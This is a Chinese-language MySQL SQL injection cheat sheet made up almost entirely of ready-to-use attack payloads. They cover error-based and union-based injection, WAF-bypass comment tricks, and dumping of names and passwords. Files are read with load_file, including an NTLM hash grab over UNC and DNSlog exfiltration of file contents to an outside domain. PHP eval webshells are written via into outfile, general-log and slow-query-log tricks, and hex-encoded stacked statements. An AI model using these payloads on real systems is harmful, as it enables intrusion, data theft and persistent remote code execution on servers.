mysql-备忘录

mysql基础注入知识

参考资料：
https://pureqh.top/?p=1882 bypass安全狗

常用函数

ascii()
length()
substr()                       # 左闭右闭
hex()
isnull()                       # isnull+load_file可以扫描判断文件名是否存在

cancat(0x7e,version(),0x7e)    # 多个字符串连接成一个字符串
concat_ws(0x7e,'a','b','c')    # 效果和concat一样

group_concat()                 # 将group by产生的同一个分组中的值连接起来，返回一个字符串结果（将一个组里的数据全部拼接起来）    https://www.cnblogs.com/xinruyi/p/11222724.html

select load_file('C:/wamp64/www/ma.php')                                                  # 读文件, 文件不存返回null, 没权限读返回null, 
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/wamp64/www/ma.php';                 # 写文件

User.html?keyword=c3514') and updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1) -- -  updatexml 报错注入
User.html?keyword=c3514') and extractvalue(1,concat(0x7e,version(),0x7e)); -- -                       extractvalue 报错注入

select load_file('\\\\172.16.100.1\\mysql');                             LOAD_FILE是支持UNC路劲  可以获取net-ntlm hash

基础注入语句

https://www.cnblogs.com/peterpan0707007/p/7536126.html

union select 1,group_concat(schema_name),3 from information_schema.schemata //爆库
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()//爆表
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='表名'//爆字段

###########################################################################################################################################

查数据库名：
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(schema_name) from information_schema.schemata),8,9,10,11,12,13,14,15,16

查表名：
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(table_name) from information_schema.tables where table_schema=database()),8,9,10,11,12,13,14,15,16

查列名：
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(column_name) from information_schema.columns where table_schema=database/*!80000aaa*/()),8,9,10,11,12,13,14,15,16

查字段：
?id=-83%20union%20/*!80000aaa*/select%201,2,3,4,5,6,(/*!80000aaa*/select/*!80000aaa*/group_concat(name,password) from adm_check),8,9,10,11,12,13,14,15,16

基本知识记录

1. 查看数据库是否可读可写

   show global variables like '%secure%';
   show global variables like "%secure_file_priv%";
   

   

   5.5.53(2019-09-29出版)默认是空，之后的话默认为NULL    历史版本查询: https://downloads.mysql.com/archives/community/
   
   
   mysql新版本下 secure_file_priv字段：secure_file_priv参数是用来限制LOAD DATA,SELECT ...OUTFILE, and LOAD_FILE()传到哪个指定目录的
   
   当secure_file_priv的值为null,表示限制mysqld不允许导入/导出
   当secure_file_priv的值为/tmp/，表示限制mysqld的导入|导出只能发生在/tmp/目录下
   当secure_file_priv的值没有具体值时，表示不对mysqld的导入|导出做限制。
   
   secure_file_priv这个值是只读变量，只能通过配置文件修改。
   

2. 判读文件是否存在

   如果文件存在，isnull(load_file('文件名'))返回0
   mysql> select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);
   ERROR 1105 (HY000): XPATH syntax error: '~0~'
   
   如果文件不存在isnull(load_file('文件名'))返回1
   mysql> select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/xxxxx')),0x7e),0);
   ERROR 1105 (HY000): XPATH syntax error: '~1~'
   

---

1 读文件

select load_file('C:/wamp64/www/ma.php')

1. 联合注入+load_file读文件
SELECT * FROM user WHERE id=-1 UNION select 1,'1',(select load_file('D:/1.php'))

2. DNSLOG带外查询
需要windows环境
SELECT id FROM user WHERE id = load_file (concat('\\\\',hex((select load_file('D:/1.php'))),'.t00ls.xxxxxxxxx.tu4.org\\a.txt'))

3. 报错注入+load_file读文件
ps:报错注入读文件内容，有时候会由于报错长度受限或者文件编码问题，推荐采用hex编码方式分段读取文件内容
select * from user  where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('D:/1.php')),0x7e),0)
select * from user where id=1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('D:/1.php'))),0x7e)))

2.1 写文件

使用条件：

A、必须有权限读取并且文件必须完全可读 
​   and (select count(*) from mysql.user)>0/* 如果结果返回正常,说明具有读写权限。
​   and (select count(*) from mysql.user)>0/* 返回错误，应该是管理员给数据库帐户降权

B、欲读取文件必须在服务器上 

C、必须指定文件完整的路径 

D、欲读取文件必须小于 max_allowed_packet

1. 基础写
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/wamp64/www/ma.php';

2. union注入写文件
SELECT * FROM user WHERE id = -1 union select 1,2,0x3c3f70687020706870696e666f28293b3f3e into outfile 'D:/1.php'

3. FIELDS TERMINATED BY（可在limit等语句后）  fields terminated by '字段间分隔符', 定义字段间的分隔符
SELECT * FROM user WHERE id = 1 into outfile 'D:/1.php' fields terminated by 0x3c3f70687020706870696e666f28293b3f3e

4.LINES TERMINATED BY（可用于limit等sql注入）  optionally enclosed by '字段包围符', 定义包围字段的字符（数值型字段无效）
SELECT username FROM user WHERE id = 1 into outfile 'D:/1.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e

5.LINES STARTING BY（可用于limit等sql注入）   lines terminated by '行间分隔符', 定义每行的分隔符
SELECT username FROM user WHERE id = 1 into outfile 'D:/2.php' LINES STARTING  BY 0x3c3f70687020706870696e666f28293b3f3e

2.2 堆叠写shell

mysql> select hex('select "<?php phpinfo();eval($_POST[x]);" into outfile "D:/wwwroot/baidu.com/test2.php"');
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| hex('select "<?php phpinfo();eval($_POST[x]);" into outfile "D:/wwwroot/baidu.com/test2.php"')                                                                                |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 73656C65637420223C3F70687020706870696E666F28293B6576616C28245F504F53545B785D293B2220696E746F206F757466696C652022443A2F777777726F6F742F737669702E636F6D2F74657374322E70687022 |
+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> set @x=0x73656C65637420223C3F70687020706870696E666F28293B6576616C28245F504F53545B785D293B2220696E746F206F757466696C652022443A2F777777726F6F742F737669702E636F6D2F74657374322E7
Query OK, 0 rows affected (0.00 sec)

mysql> prepare  xx from @x;
Query OK, 0 rows affected (0.00 sec)
Statement prepared

mysql> execute  xx;
ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
mysql>

2.3 利用日志写shell

SHOW VARIABLES LIKE 'general%'

开启日志
set global general_log = "ON";
set global general_log_file='C:/wamp64/www/ma.php';
select '<?php eval($_POST[cmd]);?>';

2.4 慢查询日志写shell

MySQL的慢查询日志是MySQL提供的一种日志记录，它用来记录在MySQL中响应时间超过阀值的语句，long_query_time的默认值为10，意思是运行10S以上的语句。该值可以指定为微秒的分辨率。具体指运行时间超过long_query_time值的SQL，则会被记录到慢查询日志中。对日志量庞大，通过日志文件GETSHELL确实是一种帮助

show variables like '%slow%';

log_slow_admin_statements	OFF
log_slow_slave_statements	OFF
slow_launch_time	2
slow_query_log	OFF
slow_query_log_file	           C:\phpstudy_pro\Extensions\MySQL5.7.26\data\root-PC-slow.log

set GLOBAL slow_query_log_file='C:/phpstudy_pro/WWW/shopxo-1.6.0/slow.php';
set GLOBAL slow_query_log=on;

select '<?php phpinfo();?>' from mysql.db where sleep(10);


还原
set GLOBAL slow_query_log_file='C:/phpstudy_pro/Extensions/MySQL5.7.26/data/root-PC-slow.log';
set GLOBAL slow_query_log=off;
show variables like '%slow%';